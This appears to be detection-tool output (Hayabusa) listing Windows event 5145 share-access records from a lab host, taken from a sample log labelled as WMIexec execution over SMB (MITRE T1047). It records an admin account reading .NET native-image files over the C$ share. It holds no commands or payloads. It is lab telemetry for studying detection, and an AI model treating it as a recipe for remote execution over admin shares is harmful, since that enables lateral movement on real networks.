2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
